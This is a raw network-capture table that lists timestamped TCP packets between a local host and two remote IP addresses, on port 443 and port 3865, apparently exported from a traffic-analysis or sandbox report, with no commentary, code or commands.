Dec 2, 2024 18:45:33.659080982 CET	49747	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:33.659095049 CET	443	49747	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:35.231924057 CET	443	49747	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:35.237140894 CET	49747	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:35.237175941 CET	443	49747	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:36.246334076 CET	443	49747	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:36.246370077 CET	443	49747	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:36.246424913 CET	49747	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:36.246943951 CET	49747	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:36.246961117 CET	443	49747	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:38.252624989 CET	49748	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:38.252681971 CET	443	49748	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:38.252768993 CET	49748	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:38.253103018 CET	49748	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:38.253120899 CET	443	49748	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:40.586867094 CET	443	49748	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:40.588805914 CET	49748	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:40.588838100 CET	443	49748	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:41.121417999 CET	443	49748	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:41.121475935 CET	443	49748	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:41.121640921 CET	49748	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:41.122155905 CET	49748	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:41.122181892 CET	443	49748	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:41.123845100 CET	49749	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:41.123889923 CET	443	49749	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:41.123975992 CET	49749	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:41.124212027 CET	49749	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:41.124222994 CET	443	49749	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:43.189457893 CET	443	49749	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:43.190949917 CET	49749	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:43.190974951 CET	443	49749	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:44.331085920 CET	443	49749	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:44.331142902 CET	443	49749	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:44.331290007 CET	49749	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:44.331623077 CET	49749	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:44.331641912 CET	443	49749	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:46.346421003 CET	49750	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:46.346477985 CET	443	49750	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:46.346561909 CET	49750	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:46.346860886 CET	49750	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:46.346878052 CET	443	49750	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:46.658198118 CET	49746	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:46.778980017 CET	3865	49746	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:47.748946905 CET	443	49750	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:47.787384033 CET	49750	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:47.787410975 CET	443	49750	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:48.724111080 CET	443	49750	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:48.724163055 CET	443	49750	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:48.724235058 CET	49750	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:48.724819899 CET	49750	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:48.724838018 CET	443	49750	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:48.726217031 CET	49751	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:48.726264000 CET	443	49751	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:48.726336956 CET	49751	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:48.726653099 CET	49751	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:48.726665974 CET	443	49751	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:53.405373096 CET	443	49751	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:53.407001972 CET	49751	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:53.407025099 CET	443	49751	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:54.716183901 CET	443	49751	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:54.716236115 CET	443	49751	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:54.716284990 CET	49751	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:54.716732025 CET	49751	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:54.716749907 CET	443	49751	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:55.086483002 CET	3865	49746	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:55.086553097 CET	49746	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:56.688992023 CET	49746	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:56.690938950 CET	49754	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:56.721553087 CET	49755	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:56.721591949 CET	443	49755	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:56.721684933 CET	49755	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:56.722019911 CET	49755	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:56.722034931 CET	443	49755	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:56.842282057 CET	3865	49746	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:56.842308998 CET	3865	49754	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:56.842578888 CET	49754	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:56.853609085 CET	49754	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:45:56.977015972 CET	3865	49754	147.185.221.24	192.168.2.4
Dec 2, 2024 18:45:58.141758919 CET	443	49755	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:58.143326998 CET	49755	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:58.143347025 CET	443	49755	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:58.668994904 CET	443	49755	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:58.669053078 CET	443	49755	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:58.669130087 CET	49755	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:58.669562101 CET	49755	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:58.669578075 CET	443	49755	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:58.670658112 CET	49761	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:58.670694113 CET	443	49761	91.134.9.160	192.168.2.4
Dec 2, 2024 18:45:58.670763969 CET	49761	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:58.670974970 CET	49761	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:45:58.670990944 CET	443	49761	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:00.091512918 CET	443	49761	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:00.093038082 CET	49761	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:00.093070030 CET	443	49761	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:00.618944883 CET	443	49761	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:00.619003057 CET	443	49761	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:00.619050980 CET	49761	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:00.619530916 CET	49761	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:00.619549036 CET	443	49761	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:02.627662897 CET	49772	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:02.627708912 CET	443	49772	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:02.627801895 CET	49772	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:02.628072977 CET	49772	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:02.628088951 CET	443	49772	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:04.495738029 CET	443	49772	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:04.497107983 CET	49772	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:04.497117996 CET	443	49772	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:05.442765951 CET	443	49772	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:05.442821980 CET	443	49772	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:05.442915916 CET	49772	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:05.443347931 CET	49772	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:05.443358898 CET	443	49772	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:05.444442987 CET	49778	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:05.444492102 CET	443	49778	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:05.444689035 CET	49778	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:05.445028067 CET	49778	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:05.445040941 CET	443	49778	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:06.817251921 CET	443	49778	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:06.818526983 CET	49778	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:06.818540096 CET	443	49778	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:07.620275021 CET	443	49778	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:07.620323896 CET	443	49778	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:07.620435953 CET	49778	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:07.620850086 CET	49778	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:07.620873928 CET	443	49778	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:09.627754927 CET	49789	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:09.627799034 CET	443	49789	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:09.627955914 CET	49789	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:09.628233910 CET	49789	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:09.628252983 CET	443	49789	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:11.048846960 CET	443	49789	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:11.070739985 CET	49789	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:11.070759058 CET	443	49789	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:11.328202963 CET	49754	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:11.448163986 CET	3865	49754	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:12.002032042 CET	49754	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:12.038172960 CET	443	49789	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:12.038225889 CET	443	49789	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:12.038275003 CET	49789	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:12.038852930 CET	49789	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:12.038868904 CET	443	49789	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:12.040196896 CET	49795	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:12.040235996 CET	443	49795	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:12.040297031 CET	49795	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:12.040677071 CET	49795	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:12.040685892 CET	443	49795	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:12.122111082 CET	3865	49754	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:13.405239105 CET	443	49795	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:13.407007933 CET	49795	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:13.407040119 CET	443	49795	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:14.205142021 CET	443	49795	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:14.205204964 CET	443	49795	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:14.205250025 CET	49795	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:14.205868959 CET	49795	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:14.205885887 CET	443	49795	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:14.705040932 CET	49754	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:14.826457977 CET	3865	49754	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:16.223058939 CET	49806	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:16.223093987 CET	443	49806	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:16.223150969 CET	49806	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:16.223690033 CET	49806	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:16.223701000 CET	443	49806	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:17.664738894 CET	443	49806	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:17.666380882 CET	49806	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:17.666400909 CET	443	49806	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:18.191517115 CET	443	49806	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:18.191663027 CET	443	49806	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:18.191725969 CET	49806	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:18.192157030 CET	49806	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:18.192172050 CET	443	49806	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:18.193435907 CET	49811	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:18.193469048 CET	443	49811	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:18.193541050 CET	49811	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:18.193850040 CET	49811	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:18.193866968 CET	443	49811	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:18.840596914 CET	3865	49754	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:18.842937946 CET	49754	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:19.657052040 CET	443	49811	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:19.711940050 CET	49811	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:19.711968899 CET	443	49811	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:20.190112114 CET	443	49811	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:20.190165997 CET	443	49811	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:20.190262079 CET	49811	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:20.191190004 CET	49811	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:20.191212893 CET	443	49811	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:22.173710108 CET	49754	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:22.179311037 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:22.206103086 CET	49823	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:22.206150055 CET	443	49823	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:22.206207991 CET	49823	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:22.206650019 CET	49823	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:22.206660986 CET	443	49823	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:22.453247070 CET	3865	49754	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:22.453274965 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:22.453386068 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:22.724158049 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:22.971246004 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:23.561111927 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:23.684967041 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:23.685067892 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:23.746443987 CET	443	49823	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:23.748198032 CET	49823	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:23.748226881 CET	443	49823	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:23.807758093 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:24.243927956 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:24.424725056 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:24.424799919 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:24.548715115 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:24.561256886 CET	443	49823	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:24.561314106 CET	443	49823	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:24.561397076 CET	49823	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:24.561842918 CET	49823	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:24.561857939 CET	443	49823	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:24.563440084 CET	49829	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:24.563488960 CET	443	49829	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:24.563560963 CET	49829	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:24.563869953 CET	49829	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:24.563894033 CET	443	49829	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:24.654762030 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:24.775497913 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:25.979577065 CET	443	49829	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:25.983658075 CET	49829	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:25.983678102 CET	443	49829	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:26.176642895 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:26.298202038 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:27.202260017 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:27.322350025 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:28.358371973 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:28.478691101 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:28.589545965 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:28.709522009 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:28.716393948 CET	443	49829	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:28.716443062 CET	443	49829	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:28.716660023 CET	49829	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:28.717216015 CET	49829	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:28.717237949 CET	443	49829	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:29.328893900 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:29.451241016 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:29.452059031 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:29.574451923 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:29.574743986 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:29.698577881 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:29.830360889 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:29.950386047 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:30.252546072 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:30.372467041 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:30.372525930 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:30.492479086 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:30.697046041 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:30.721446991 CET	49841	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:30.721472979 CET	443	49841	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:30.721535921 CET	49841	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:30.721818924 CET	49841	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:30.721829891 CET	443	49841	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:30.817063093 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:30.876987934 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:30.998982906 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:32.140949965 CET	443	49841	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:32.144828081 CET	49841	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:32.144859076 CET	443	49841	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:32.165041924 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:32.285619020 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:32.412698984 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:32.533004045 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:32.612668037 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:32.733078003 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:32.765856028 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:32.885967970 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:32.956934929 CET	443	49841	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:32.956991911 CET	443	49841	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:32.957159042 CET	49841	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:32.957498074 CET	49841	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:32.957516909 CET	443	49841	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:32.958595037 CET	49847	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:32.958632946 CET	443	49847	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:32.958832979 CET	49847	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:32.959139109 CET	49847	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:32.959147930 CET	443	49847	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:33.384548903 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:33.505021095 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:34.382384062 CET	443	49847	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:34.431973934 CET	49847	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:34.431992054 CET	443	49847	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:35.197948933 CET	443	49847	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:35.198009014 CET	443	49847	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:35.198076010 CET	49847	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:35.198642015 CET	49847	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:35.198656082 CET	443	49847	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:35.205738068 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:35.325686932 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:35.328017950 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:35.448550940 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:35.448653936 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:35.568662882 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:35.897283077 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:36.017561913 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:36.017622948 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:36.137640953 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:37.207541943 CET	49856	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:37.207591057 CET	443	49856	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:37.207654953 CET	49856	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:37.208046913 CET	49856	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:37.208055973 CET	443	49856	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:39.283560991 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:39.454045057 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:40.010683060 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:40.130641937 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:41.405236006 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:41.525188923 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:41.840420961 CET	443	49856	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:41.845441103 CET	49856	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:41.845462084 CET	443	49856	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:42.010699987 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:42.131380081 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:42.135927916 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:42.256078959 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:42.256136894 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:42.377350092 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:42.606281996 CET	443	49856	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:42.606328011 CET	443	49856	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:42.606401920 CET	49856	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:42.606774092 CET	49856	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:42.606787920 CET	443	49856	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:42.607712030 CET	49866	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:42.607724905 CET	443	49866	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:42.607906103 CET	49866	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:42.608237982 CET	49866	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:42.608247995 CET	443	49866	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:43.120722055 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:43.240616083 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:43.345968008 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:43.466099977 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:43.522624969 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:43.643404961 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:43.643538952 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:43.763542891 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:43.764049053 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:43.887481928 CET	3865	49822	147.185.221.24	192.168.2.4
